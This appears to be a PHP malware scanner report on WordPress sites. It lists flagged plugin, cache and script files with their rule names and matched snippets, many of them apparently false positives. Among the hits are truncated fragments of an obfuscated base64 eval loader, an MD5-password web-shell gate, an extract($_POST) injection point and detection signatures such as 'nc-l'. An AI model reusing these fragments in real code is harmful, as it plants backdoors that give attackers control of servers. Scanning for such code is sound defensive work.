| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2020-02-25 17:50:40 Modified: 2021-03-17 22:57:58 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.30 kB Created: 2020-02-25 17:50:40 Modified: 2021-03-17 22:57:58 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 185.99 kB Created: 2020-02-25 17:50:40 Modified: 2021-03-17 22:57:58 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 799.00 B Created: 2020-02-25 17:50:40 Modified: 2021-03-17 22:57:58 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 12 Dangerous Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request |
extract($_POST)
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.79 kB Created: 2019-12-03 18:46:52 Modified: 2021-03-17 22:57:57 Dangers: 1
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.14 kB Created: 2019-12-03 18:46:52 Modified: 2021-03-17 22:57:57 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 82.97 kB Created: 2019-12-03 18:46:52 Modified: 2021-03-17 22:57:57 Dangers: 1
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.36 kB Created: 2019-12-03 18:46:52 Modified: 2021-03-17 22:57:57 Dangers: 1
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2019-12-03 18:46:52 Modified: 2021-03-17 22:57:57 Warns: 3
| Description | Match |
|---|
Exploit too_many_chr Line: 1071 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/ajax-search-pro/backend/search.php Size: 21.91 kB Created: 2019-12-03 18:46:52 Modified: 2021-03-17 22:57:57 Dangers: 1
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.39 kB Created: 2019-12-03 18:46:52 Modified: 2021-03-17 22:57:57 Dangers: 1
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.03 kB Created: 2019-12-03 18:46:52 Modified: 2021-03-17 22:57:57 Dangers: 1
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.51 kB Created: 2019-12-03 18:46:52 Modified: 2021-03-17 22:57:57 Dangers: 1
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 5.94 kB Created: 2019-12-03 18:46:52 Modified: 2021-03-17 22:57:57 Dangers: 1
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.81 kB Created: 2019-12-03 18:46:52 Modified: 2021-03-17 22:57:57 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.36 kB Created: 2019-12-03 18:46:52 Modified: 2021-03-17 22:57:57 Dangers: 1
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 6.91 kB Created: 2019-12-03 18:46:52 Modified: 2021-03-17 22:57:57 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 177 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/script_smartwall/update.php Size: 9.06 kB Created: 2020-09-30 20:45:42 Modified: 2021-03-31 20:11:40 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/script_smartwall/index.php Size: 38.45 kB Created: 2020-09-30 20:45:41 Modified: 2021-03-31 20:11:39 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/script_smartwall/smartwall.php Size: 8.87 kB Created: 2020-09-30 20:45:42 Modified: 2021-03-31 20:11:40 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|
//var/www/voronezh/data/www/intim-voronezha.info/script_smartwall/update.php Size: 9.06 kB Created: 2020-09-30 20:45:42 Modified: 2021-03-17 22:57:56 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/voronezh/data/www/intim-voronezha.info/script_smartwall/index.php Size: 38.45 kB Created: 2020-09-30 20:45:41 Modified: 2021-03-17 22:57:56 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/voronezh/data/www/intim-voronezha.info/script_smartwall/smartwall.php Size: 8.87 kB Created: 2020-09-30 20:45:42 Modified: 2021-03-17 22:57:56 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/cache/object/fbd/5ba/fbd5baf57f4a3e13e60b3ad4dc8fdbb3.php Size: 343.36 kB Created: 2020-11-30 19:22:05 Modified: 2020-11-30 19:22:05 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 1372 Dangerous Malware Signature (hash: 11413268) |
exploit
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/cache/object/0ab/5a6/0ab5a64560fb20dc9d5e6c5ea662b057.php Size: 45.95 kB Created: 2020-11-30 19:22:14 Modified: 2020-11-30 19:22:14 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 161 Dangerous Malware Signature (hash: 11413268) |
exploit
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/cache/object/ba8/86a/ba886a3388341724b8771ad7a8ed860b.php Size: 45.94 kB Created: 2020-11-30 19:22:14 Modified: 2020-11-30 19:22:14 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 161 Dangerous Malware Signature (hash: 11413268) |
exploit
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/cache/object/dbd/ee4/dbdee4a9dca679997e4bd43c3c293092.php Size: 26.69 kB Created: 2020-11-30 19:22:08 Modified: 2020-11-30 19:22:08 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 161 Dangerous Malware Signature (hash: 11413268) |
exploit
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/cache/object/8d2/19f/8d219f1370c0e393874bfb387255d810.php Size: 343.34 kB Created: 2020-11-30 19:22:05 Modified: 2020-11-30 19:22:05 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 1372 Dangerous Malware Signature (hash: 11413268) |
exploit
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/cache/object/0c5/dde/0c5ddec9619cc0ed20e9d69ef625dee0.php Size: 26.68 kB Created: 2020-11-30 19:22:07 Modified: 2020-11-30 19:22:07 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 161 Dangerous Malware Signature (hash: 11413268) |
exploit
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/cache/page/175/06f/17506fcfc7297253a07ad0edeb597452.php Size: 84.89 kB Created: 2020-11-30 19:21:51 Modified: 2020-11-30 19:21:51 Warns: 1 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 406 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"ewogICAgImhvbWV1cmwiOiAiaHR0cHM6Ly9zZXguc2hsanVoaXZzYW1hcmEucnUvIiwKICAgICJyZXN1bHRzdHlwZSI6ICJ2ZXJ0aWNhbCIsCiAgICAicmVzdWx0c3Bvc2l0aW9uIjogImhvdmVyIiwKICAgICJyZXN1bHRzU25hcFRvIjogImxlZnQiLAogICAgInJlc3VsdHMiOiB7CiAgICAgICAgIndpZHRoIjogImF1dG8iLAogICAgICAgICJ3aWR0aF90YWJsZXQiOiAiYXV0byIsCiAgICAgICAgIndpZHRoX3Bob25lIjogImF1dG8iCiAgICB9LAogICAgIml0ZW1zY291bnQiOiA0LAogICAgImltYWdld2lkdGgiOiA3MCwKICAgICJpbWFnZWhlaWdodCI6IDcwLAogICAgInJlc3VsdGl0ZW1oZWlnaHQiOiAiYXV0byIsCiAgICAic2hvd2F1dGhvciI6IDAsCiA...
| Sign 7f5d33bf Line: 406 Dangerous Malware Signature (hash: 7f5d33bf) |
jbG9zZ
| Sign a408f408 Line: 406 Dangerous Malware Signature (hash: a408f408) |
c3Rhd
| Sign ae7830db Line: 406 Dangerous Malware Signature (hash: ae7830db) |
Y2xvc2
| Sign d97f004d Line: 406 Dangerous Malware Signature (hash: d97f004d) |
zdGF0
| Sign ee1cb326 Line: 406 Dangerous Malware Signature (hash: ee1cb326) |
9wZW
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/cache/page/2bb/b73/2bbb73117846038b8ba76c464ca76736.php Size: 87.33 kB Created: 2020-11-30 18:50:32 Modified: 2020-11-30 18:50:32 Warns: 1 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 406 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"ewogICAgImhvbWV1cmwiOiAiaHR0cHM6Ly9zZXguc2hsanVoaXZzYW1hcmEucnUvIiwKICAgICJyZXN1bHRzdHlwZSI6ICJ2ZXJ0aWNhbCIsCiAgICAicmVzdWx0c3Bvc2l0aW9uIjogImhvdmVyIiwKICAgICJyZXN1bHRzU25hcFRvIjogImxlZnQiLAogICAgInJlc3VsdHMiOiB7CiAgICAgICAgIndpZHRoIjogImF1dG8iLAogICAgICAgICJ3aWR0aF90YWJsZXQiOiAiYXV0byIsCiAgICAgICAgIndpZHRoX3Bob25lIjogImF1dG8iCiAgICB9LAogICAgIml0ZW1zY291bnQiOiA0LAogICAgImltYWdld2lkdGgiOiA3MCwKICAgICJpbWFnZWhlaWdodCI6IDcwLAogICAgInJlc3VsdGl0ZW1oZWlnaHQiOiAiYXV0byIsCiAgICAic2hvd2F1dGhvciI6IDAsCiA...
| Sign 7f5d33bf Line: 406 Dangerous Malware Signature (hash: 7f5d33bf) |
jbG9zZ
| Sign a408f408 Line: 406 Dangerous Malware Signature (hash: a408f408) |
c3Rhd
| Sign ae7830db Line: 406 Dangerous Malware Signature (hash: ae7830db) |
Y2xvc2
| Sign d97f004d Line: 406 Dangerous Malware Signature (hash: d97f004d) |
zdGF0
| Sign ee1cb326 Line: 406 Dangerous Malware Signature (hash: ee1cb326) |
9wZW
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/cache/page/d76/b00/d76b002f026d76d745d3230489e8deee.php Size: 483.83 kB Created: 2020-11-30 19:00:11 Modified: 2020-11-30 19:00:11 Warns: 1 Dangers: 4
| Description | Match |
|---|
Exploit base64_long Line: 634 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"ewogICAgImhvbWV1cmwiOiAiaHR0cHM6Ly9zaGxqdWhpdnNhbWFyYS5ydS8iLAogICAgInJlc3VsdHN0eXBlIjogInZlcnRpY2FsIiwKICAgICJyZXN1bHRzcG9zaXRpb24iOiAiaG92ZXIiLAogICAgInJlc3VsdHNTbmFwVG8iOiAibGVmdCIsCiAgICAicmVzdWx0cyI6IHsKICAgICAgICAid2lkdGgiOiAiYXV0byIsCiAgICAgICAgIndpZHRoX3RhYmxldCI6ICJhdXRvIiwKICAgICAgICAid2lkdGhfcGhvbmUiOiAiYXV0byIKICAgIH0sCiAgICAiaXRlbXNjb3VudCI6IDQsCiAgICAiaW1hZ2V3aWR0aCI6IDcwLAogICAgImltYWdlaGVpZ2h0IjogNzAsCiAgICAicmVzdWx0aXRlbWhlaWdodCI6ICJhdXRvIiwKICAgICJzaG93YXV0aG9yIjogMCwKICAgICJ...
| Sign 7830f7a6 Line: 634 Dangerous Malware Signature (hash: 7830f7a6) |
N0YX
| Sign a408f408 Line: 634 Dangerous Malware Signature (hash: a408f408) |
c3Rhd
| Sign ae7830db Line: 634 Dangerous Malware Signature (hash: ae7830db) |
Y2xvc2
| Sign de12c454 Line: 634 Dangerous Malware Signature (hash: de12c454) |
vcGVu
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/cache/page/481/98e/48198eb1a23438601e793a1e3cab7160.php Size: 138.88 kB Created: 2020-11-30 18:17:01 Modified: 2020-11-30 18:17:01 Warns: 1 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 642 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"ewogICAgImhvbWV1cmwiOiAiaHR0cHM6Ly93d3cuc2hsanVoaXZzYW1hcmEucnUvIiwKICAgICJyZXN1bHRzdHlwZSI6ICJ2ZXJ0aWNhbCIsCiAgICAicmVzdWx0c3Bvc2l0aW9uIjogImhvdmVyIiwKICAgICJyZXN1bHRzU25hcFRvIjogImxlZnQiLAogICAgInJlc3VsdHMiOiB7CiAgICAgICAgIndpZHRoIjogImF1dG8iLAogICAgICAgICJ3aWR0aF90YWJsZXQiOiAiYXV0byIsCiAgICAgICAgIndpZHRoX3Bob25lIjogImF1dG8iCiAgICB9LAogICAgIml0ZW1zY291bnQiOiA0LAogICAgImltYWdld2lkdGgiOiA3MCwKICAgICJpbWFnZWhlaWdodCI6IDcwLAogICAgInJlc3VsdGl0ZW1oZWlnaHQiOiAiYXV0byIsCiAgICAic2hvd2F1dGhvciI6IDAsCiA...
| Sign 7f5d33bf Line: 642 Dangerous Malware Signature (hash: 7f5d33bf) |
jbG9zZ
| Sign a408f408 Line: 642 Dangerous Malware Signature (hash: a408f408) |
c3Rhd
| Sign ae7830db Line: 642 Dangerous Malware Signature (hash: ae7830db) |
Y2xvc2
| Sign d97f004d Line: 642 Dangerous Malware Signature (hash: d97f004d) |
zdGF0
| Sign ee1cb326 Line: 642 Dangerous Malware Signature (hash: ee1cb326) |
9wZW
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/cache/page/7af/dc5/7afdc5b579b000bbcb3318f2f2233956.php Size: 141.08 kB Created: 2020-11-30 17:45:00 Modified: 2020-11-30 17:45:00 Warns: 1 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 640 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"ewogICAgImhvbWV1cmwiOiAiaHR0cHM6Ly9zZXguc2hsanVoaXZzYW1hcmEucnUvIiwKICAgICJyZXN1bHRzdHlwZSI6ICJ2ZXJ0aWNhbCIsCiAgICAicmVzdWx0c3Bvc2l0aW9uIjogImhvdmVyIiwKICAgICJyZXN1bHRzU25hcFRvIjogImxlZnQiLAogICAgInJlc3VsdHMiOiB7CiAgICAgICAgIndpZHRoIjogImF1dG8iLAogICAgICAgICJ3aWR0aF90YWJsZXQiOiAiYXV0byIsCiAgICAgICAgIndpZHRoX3Bob25lIjogImF1dG8iCiAgICB9LAogICAgIml0ZW1zY291bnQiOiA0LAogICAgImltYWdld2lkdGgiOiA3MCwKICAgICJpbWFnZWhlaWdodCI6IDcwLAogICAgInJlc3VsdGl0ZW1oZWlnaHQiOiAiYXV0byIsCiAgICAic2hvd2F1dGhvciI6IDAsCiA...
| Sign 7f5d33bf Line: 640 Dangerous Malware Signature (hash: 7f5d33bf) |
jbG9zZ
| Sign a408f408 Line: 640 Dangerous Malware Signature (hash: a408f408) |
c3Rhd
| Sign ae7830db Line: 640 Dangerous Malware Signature (hash: ae7830db) |
Y2xvc2
| Sign d97f004d Line: 640 Dangerous Malware Signature (hash: d97f004d) |
zdGF0
| Sign ee1cb326 Line: 640 Dangerous Malware Signature (hash: ee1cb326) |
9wZW
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/cache/page/dc4/b31/dc4b31f5aa09bfba045956549be8ccfe.php Size: 216.43 kB Created: 2020-11-30 18:27:56 Modified: 2020-11-30 18:27:56 Warns: 1 Dangers: 4
| Description | Match |
|---|
Exploit base64_long Line: 780 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"ewogICAgImhvbWV1cmwiOiAiaHR0cHM6Ly9zaGxqdWhpdnNhbWFyYS5ydS8iLAogICAgInJlc3VsdHN0eXBlIjogInZlcnRpY2FsIiwKICAgICJyZXN1bHRzcG9zaXRpb24iOiAiaG92ZXIiLAogICAgInJlc3VsdHNTbmFwVG8iOiAibGVmdCIsCiAgICAicmVzdWx0cyI6IHsKICAgICAgICAid2lkdGgiOiAiYXV0byIsCiAgICAgICAgIndpZHRoX3RhYmxldCI6ICJhdXRvIiwKICAgICAgICAid2lkdGhfcGhvbmUiOiAiYXV0byIKICAgIH0sCiAgICAiaXRlbXNjb3VudCI6IDQsCiAgICAiaW1hZ2V3aWR0aCI6IDcwLAogICAgImltYWdlaGVpZ2h0IjogNzAsCiAgICAicmVzdWx0aXRlbWhlaWdodCI6ICJhdXRvIiwKICAgICJzaG93YXV0aG9yIjogMCwKICAgICJ...
| Sign 7830f7a6 Line: 780 Dangerous Malware Signature (hash: 7830f7a6) |
N0YX
| Sign a408f408 Line: 780 Dangerous Malware Signature (hash: a408f408) |
c3Rhd
| Sign ae7830db Line: 780 Dangerous Malware Signature (hash: ae7830db) |
Y2xvc2
| Sign de12c454 Line: 780 Dangerous Malware Signature (hash: de12c454) |
vcGVu
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/cache/page/3bb/19c/3bb19c70f7c5f0ad4af5714c82c4510a.php Size: 68.58 kB Created: 2020-11-30 17:50:15 Modified: 2020-11-30 17:50:15 Warns: 1 Dangers: 4
| Description | Match |
|---|
Exploit base64_long Line: 637 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"ewogICAgImhvbWV1cmwiOiAiaHR0cHM6Ly9zaGxqdWhpdnNhbWFyYS5ydS8iLAogICAgInJlc3VsdHN0eXBlIjogInZlcnRpY2FsIiwKICAgICJyZXN1bHRzcG9zaXRpb24iOiAiaG92ZXIiLAogICAgInJlc3VsdHNTbmFwVG8iOiAibGVmdCIsCiAgICAicmVzdWx0cyI6IHsKICAgICAgICAid2lkdGgiOiAiYXV0byIsCiAgICAgICAgIndpZHRoX3RhYmxldCI6ICJhdXRvIiwKICAgICAgICAid2lkdGhfcGhvbmUiOiAiYXV0byIKICAgIH0sCiAgICAiaXRlbXNjb3VudCI6IDQsCiAgICAiaW1hZ2V3aWR0aCI6IDcwLAogICAgImltYWdlaGVpZ2h0IjogNzAsCiAgICAicmVzdWx0aXRlbWhlaWdodCI6ICJhdXRvIiwKICAgICJzaG93YXV0aG9yIjogMCwKICAgICJ...
| Sign 7830f7a6 Line: 637 Dangerous Malware Signature (hash: 7830f7a6) |
N0YX
| Sign a408f408 Line: 637 Dangerous Malware Signature (hash: a408f408) |
c3Rhd
| Sign ae7830db Line: 637 Dangerous Malware Signature (hash: ae7830db) |
Y2xvc2
| Sign de12c454 Line: 637 Dangerous Malware Signature (hash: de12c454) |
vcGVu
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/cache/page/d16/b1c/d16b1c32481256cc1a44f7559efbab23.php Size: 485.85 kB Created: 2020-11-30 18:17:06 Modified: 2020-11-30 18:17:06 Warns: 1 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 635 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
